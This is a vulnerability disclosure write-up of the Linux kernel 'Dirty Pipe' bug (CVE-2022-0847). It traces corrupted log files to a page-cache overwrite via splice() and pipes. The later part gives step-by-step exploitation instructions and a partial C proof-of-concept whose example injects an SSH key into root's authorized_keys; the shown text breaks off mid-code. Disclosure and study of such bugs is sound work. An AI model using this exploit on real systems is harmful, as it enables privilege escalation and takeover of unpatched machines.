Max Kellermann


This is the story of CVE-2022-0847, a vulnerability in the Linux
kernel since 5.8 which allows overwriting data in arbitrary
read-only files. This leads to privilege escalation because
unprivileged processes can inject code into root processes.

It is similar to CVE-2016-5195 “Dirty Cow”, but easier to exploit.

The vulnerability was fixed
in Linux 5.16.11, 5.15.25 and 5.10.102.

Corruption pt. I

It all started a year ago with a support ticket about corrupt files.
A customer complained that the access logs they downloaded could not
be decompressed. And indeed, there was a corrupt log file on one of
the log servers; it could be decompressed, but gzip reported a CRC
error. I could not explain why it was corrupt, but I assumed the
nightly split process had crashed and left a corrupt file behind. I
fixed the file's CRC manually, closed the ticket, and soon forgot
about the problem.

Months later, this happened again, and yet again. Every time, the
file's contents looked correct, only the CRC at the end of the file
was wrong. Now, with several corrupt files, I was able to dig deeper
and found a surprising kind of corruption. A pattern emerged.

Access Logging

Let me briefly introduce how our log server works: in the CM4all
hosting environment, all web servers (running our custom open source
HTTP server
) send UDP
multicast datagrams with metadata about each HTTP request. These are
received by the log servers running Pond, our custom open source
in-memory database. A nightly job splits all access logs of the
previous day into one file per hosted web site, each compressed with
zlib.

Via HTTP, all access logs of a month can be downloaded as a single
.gz file. Using a trick (which involves Z_SYNC_FLUSH), we can
just concatenate all gzipped daily log files without having to
decompress and recompress them, which means this HTTP request
consumes nearly no CPU. Memory bandwidth is saved by employing the
splice() system call to feed the data directly from the hard disk
into the HTTP connection, without it passing the kernel/userspace
boundary.

Windows users can't handle .gz files, but everybody can extract
ZIP files. A ZIP file is just a container for .gz files, so we
could use the same approach to generate ZIP files on-the-fly; all we
needed to do was send a ZIP header first, then concatenate all .gz
file contents as usual, followed by the central directory (another
kind of header).

Corruption pt. II

This is what the end of a valid daily file looks like:

000005f0  81 d6 94 39 8a 05 b0 ed  e9 c0 fd 07 00 00 ff ff
00000600  03 00 9c 12 0b f5 f7 4a  00 00

The 00 00 ff ff is the sync flush which allows simple
concatenation. 03 00 is an empty “final” block, and it is
followed by a CRC32 (0xf50b129c) and the uncompressed file size
(0x00004af7 = 19191 bytes).

The same file, but corrupted:

000005f0  81 d6 94 39 8a 05 b0 ed  e9 c0 fd 07 00 00 ff ff
00000600  03 00 50 4b 01 02 1e 03  14 00

The sync flush is there, the empty final block is there, but the
uncompressed size is now 0x0014031e = 1.3 MB (wrong; it is the
same 19 kB file as above). The CRC32 is 0x02014b50, which does
not match the file contents. Why? Is this an out-of-bounds write or
a heap corruption bug in our log client?

I compared all known-corrupt files and found, to my surprise, that
all of them had the same CRC32 and the same “file size” value.
Always the same CRC – this meant it could not be the result of a CRC
calculation; with corrupt data, we would see varying (but wrong) CRC
values. For hours, I stared holes into the code but could not find
an explanation.

Then I stared at those 8 bytes. Eventually, I noticed that 50 4b
is ASCII for “P” and “K”. “PK” is how every ZIP header starts.
Let's have a look at those 8 bytes again:

  • 50 4b is “PK”

  • 01 02 is the code for a central directory file header.

  • “Version made by” = 1e 03; 0x1e = 30 (3.0); 0x03 = UNIX

  • “Version needed to extract” = 14 00; 0x0014 = 20 (2.0)

The rest is missing; the header was apparently truncated after 8
bytes.

This really is the beginning of a ZIP central directory file header,
it cannot be a coincidence. But the process which writes these files
has no code to generate such a header. In my desperation, I looked
at the zlib source code and all the other libraries used by that
process, but found nothing. This piece of software knows nothing
about “PK” headers.

There is one process which does generate “PK” headers, though; it is
the web service which constructs ZIP files on-the-fly. But this
process runs as a different user which does not have write
permissions on these files. It cannot possibly be that process.

None of this made sense, but new support tickets kept coming in (at
a very slow rate). There was some systematic problem, but I just
couldn't get a grip on it. That gave me a lot of frustration, but I
was busy with other projects, and I kept pushing this file
corruption problem to the back of my queue.

Corruption pt. III

External pressure brought this problem back into my consciousness. I
scanned the whole hard disk for corrupt files (which took two days),
hoping for more patterns to emerge. And indeed, there was a pattern:

  • there were 37 corrupt files within the past 3 months

  • they occurred on 22 distinct days

  • 18 of those days have 1 corruption

  • 1 day has 2 corruptions (2021-11-21)

  • 1 day has 7 corruptions (2021-11-30)

  • 1 day has 6 corruptions (2021-12-31)

  • 1 day has 4 corruptions (2022-01-31)

The last day of each month is clearly the one with the most
corruptions.

Only the primary log server had corruptions (the one which served
HTTP connections and constructed ZIP files). The standby server
(HTTP inactive but with an identical log extraction process) had
zero corruptions. The data on both servers was identical, minus
those corruptions.

Is this caused by flaky hardware? Bad RAM? Bad storage? Cosmic rays?
No, the symptoms do not look like a hardware problem. A ghost in the
machine? Do we need an exorcist?

Man staring at code

I started staring holes into my code again, this time the web service.

Remember, the web service writes a ZIP header, then uses splice()
to send all compressed files, and finally uses write() again for
the “central directory file header”, which begins with 50 4b 01 02
1e 03 14 00
, exactly the corruption. The data sent over the wire
looks exactly like the corrupt files on disk. But the process
sending this over the wire has no write permissions on those files
(and does not even attempt to write them), it only reads them.
Against all odds and against the impossible, it must be that process
which causes the corruptions, but how?

My first flash of inspiration explained why it is always the last
day of the month which gets corrupted. When a website owner
downloads the access log, the server starts with the first day of
the month, then the second day, and so on. Naturally, the last day
of the month is sent at the end; the last day of the month is always
followed by the “PK” header. That is why the last day is the most
likely to get corrupted. (The other days can be corrupted if the
requested month is not yet over, but that is less likely.)


Man staring at kernel code

After being stuck for more hours, after eliminating everything that
was definitely impossible (in my opinion), I drew a conclusion: this
must be a kernel bug.

Blaming the Linux kernel (i.e. somebody else's code) for data
corruption must be the last resort. That is unlikely. The kernel is
an extremely complex project developed by thousands of individuals
with methods that may seem chaotic; despite this, it is extremely
stable and reliable. But this time, I was convinced that it had to
be a kernel bug.

In a moment of extraordinary clarity, I hacked two C programs.

One that keeps writing odd chunks of the string “AAAAA” to a file
(simulating the log splitter):

#include <unistd.h>

int main(int argc, char **argv) {
  for (;;) write(1, "AAAAA", 5);
}
// ./writer >foo

And one that keeps transferring data from that file to a pipe using
splice() and then writes the string “BBBBB” to the pipe
(simulating the ZIP generator):

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>

int main(int argc, char **argv) {
  for (;;) {
    splice(0, 0, 1, 0, 2, 0);
    write(1, "BBBBB", 5);
  }
}
// ./splicer <foo |cat >/dev/null

I copied those two programs to the log server, and… bingo! The
string “BBBBB” started appearing in the file, even though nobody
ever wrote this string to the file (only to the pipe by a process
without write permissions).

So this really is a kernel bug!

All bugs become shallow once they can be reproduced. A quick check
verified that this bug affects Linux 5.10 (Debian Bullseye) but not
Linux 4.19 (Debian Buster). There are 185,011 git commits between
v4.19 and v5.10, but thanks to git bisect, it takes just 17 steps
to track down the culprit commit.

The bisect arrived at commit f6dd975583bd,
which refactors the pipe buffer code for anonymous pipe buffers. It
changes the way the “mergeable” check is done for pipes.

Pipes and Buffers and Pages

Why pipes, anyway? In our setup, the web service which generates ZIP
files communicates with the web server over pipes; it speaks the Web
Application Socket
protocol
which we invented because we were not happy with CGI, FastCGI and AJP.
Using pipes rather than multiplexing over a socket (like FastCGI and
AJP do) has a major advantage: you can use splice() in both the
application and the web server for maximum efficiency. This reduces
the overhead of having web applications out-of-process (as opposed
to running web services inside the web server process, like Apache
modules do). This allows privilege separation without sacrificing
(much) performance.

A quick detour on Linux memory management:
the smallest unit of memory managed by the CPU is a page (usually
4 kB). Everything in the lowest layer of Linux's memory management is
about pages. If an application requests memory from the kernel, it
will get a number of (anonymous) pages. All file I/O is also about
pages: if you read data from a file, the kernel first copies a bunch
of 4 kB chunks from the hard disk into kernel memory, managed by a
subsystem called the page cache. From there, the data will be
copied to userspace. The copy in the page cache remains for some
time, where it can be used again, avoiding unnecessary hard disk I/O,
until the kernel decides it has a better use for that memory
(“reclaim”). Instead of copying file data to userspace memory, pages
managed by the page cache can be mapped directly into userspace using
the mmap() system call (a trade-off for reduced memory bandwidth
at the cost of increased page faults and TLB flushes). The Linux
kernel has more tricks: the sendfile() system call allows an
application to send file contents into a socket without a roundtrip
to userspace (an optimization popular in web servers serving static
files over HTTP). The splice() system call is kind of a
generalization of sendfile(): it allows the same optimization if
either side of the transfer is a pipe; the other side can be almost
anything (another pipe, a file, a socket, a block device, a character
device). The kernel implements this by passing page references
around, not actually copying anything (zero-copy).

A pipe is a tool for unidirectional inter-process communication.
One end is for pushing data into it, the other end can pull that
data. The Linux kernel implements this by a ring
of struct pipe_buffer,
each referring to a page. The first write to a pipe allocates a
page (space for 4 kB worth of data). If the most recent write does
not fill the page completely, a following write may append to that
existing page instead of allocating a new one. This is how
“anonymous” pipe buffers work (anon_pipe_buf_ops).

If you, however, splice() data from a file into the pipe, the
kernel will first load the data into the page cache. Then it will
create a struct pipe_buffer pointing into the page cache
(zero-copy), but unlike anonymous pipe buffers, additional data
written to the pipe must not be appended to such a page, because the
page is owned by the page cache, not by the pipe.

History of the check for whether new data can be appended to an
existing pipe buffer:

Over the years, this check was refactored back and forth, which was
okay. Or was it?


Several years before PIPE_BUF_FLAG_CAN_MERGE was born, commit
241699cd72a8 “new iov_iter flavour: pipe-backed” (Linux 4.9, 2016)

added two new functions which allocate a new struct pipe_buffer,
but initialization of its flags member was missing. It was now
possible to create page cache references with arbitrary flags, but
that did not matter. It was technically a bug, though without
consequences at the time, because all of the existing flags were
rather boring.

This bug became critical in Linux 5.8 with commit
f6dd975583bd “pipe: merge anon_pipe_buf*_ops”.
By injecting PIPE_BUF_FLAG_CAN_MERGE into a page cache reference,
it became possible to overwrite data in the page cache, simply by
writing new data into the pipe prepared in a special way.

Corruption pt. IV

This explains the file corruption: first, some data gets written
into the pipe, then lots of files get spliced, creating page cache
references. Randomly, those may or may not have
PIPE_BUF_FLAG_CAN_MERGE set. If yes, then the write() call
that writes the central directory file header will be written into
the page cache of the last compressed file.

But why only the first 8 bytes of that header? Actually, all of the
header gets copied to the page cache, but this operation does not
increase the file size. The original file had only 8 bytes of
“unspliced” space at the end, and only those bytes could be
overwritten. The rest of the page is unused from the page cache's
point of view (though the pipe buffer code does use it, because it
has its own page fill management).

And why does this not happen more often? Because the page cache does
not write back to disk unless it believes the page is “dirty”.
Accidentally overwriting data in the page cache will not make the
page “dirty”. If no other process happens to “dirty” the file, this
change will be ephemeral; after the next reboot (or after the kernel
decides to drop the page from the cache, e.g. reclaim under memory
pressure), the change is reverted. This allows interesting attacks
without leaving a trace on the hard disk.


In my first exploit (the “writer” / “splicer” programs which I used
for the bisect), I had assumed that this bug is only exploitable
while a privileged process writes the file, and that it depends on
timing.

When I realized what the actual problem was, I was able to widen the
hole by a large margin: it is possible to overwrite the page cache
even in the absence of writers, with no timing constraints, at
(almost) arbitrary positions with arbitrary data. The limitations
are:

  • the attacker must have read permissions (because it needs to
    splice() a page into a pipe)

  • the offset must not be on a page boundary (because at least one
    byte of that page must have been spliced into the pipe)

  • the write cannot cross a page boundary (because a new anonymous
    buffer would be created for the rest)

  • the file cannot be resized (because the pipe has its own page
    fill management and does not tell the page cache how much data
    has been appended)
To exploit this vulnerability, you need to:

  1. Create a pipe.

  2. Fill the pipe with arbitrary data (to set the
     PIPE_BUF_FLAG_CAN_MERGE flag in all ring entries).

  3. Drain the pipe (leaving the flag set in all struct pipe_buffer
     instances on the struct pipe_inode_info ring).

  4. Splice data from the target file (opened with O_RDONLY) into
     the pipe from just before the target offset.

  5. Write arbitrary data into the pipe; this data will overwrite the
     cached file page instead of creating a new anonymous struct
     pipe_buffer, because PIPE_BUF_FLAG_CAN_MERGE is set.

To make this vulnerability more interesting, it not only works
without write permissions, it also works with immutable files, on
read-only btrfs snapshots and on read-only mounts (including CD-ROM
mounts). That is because the page cache is always writable (by the
kernel), and writing to a pipe never checks any permissions.

This is my proof-of-concept exploit:

/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation:
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* fill the pipe completely; each pipe_buffer will now have
	   the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* drain the pipe, freeing all pipe_buffer instances (but
	   leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* the pipe is now empty, and if somebody adds a new
	   pipe_buffer without initializing its "flags", the buffer
	   will be mergeable */
}

int main(int argc, char **argv)
{
	if (argc != 4) {
		fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
		return EXIT_FAILURE;
	}

	/* dumb command-line argument parser */
	const char *const path = argv[1];
	loff_t offset = strtoul(argv[2], NULL, 0);
	const char *const data = argv[3];
	const size_t data_size = strlen(data);

	if (offset % PAGE_SIZE == 0) {
		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
		return EXIT_FAILURE;
	}

	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
	const loff_t end_offset = offset + (loff_t)data_size;
	if (end_offset > next_page) {
		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
		return EXIT_FAILURE;
	}

	/* open the input file and validate the specified offset */
	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
	if (fd < 0) {
		perror("open failed");
		return EXIT_FAILURE;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return EXIT_FAILURE;
	}

	if (offset > st.st_size) {
		fprintf(stderr, "Offset is not inside the file\n");
		return EXIT_FAILURE;
	}

	if (end_offset > st.st_size) {
		fprintf(stderr, "Sorry, cannot enlarge the file\n");
		return EXIT_FAILURE;
	}

	/* create the pipe with all flags initialized with
	   PIPE_BUF_FLAG_CAN_MERGE */
	int p[2];
	prepare_pipe(p);

	/* splice one byte from before the specified offset into the
	   pipe; this will add a reference to the page cache, but
	   since copy_page_to_iter_pipe() does not initialize the
	   "flags", PIPE_BUF_FLAG_CAN_MERGE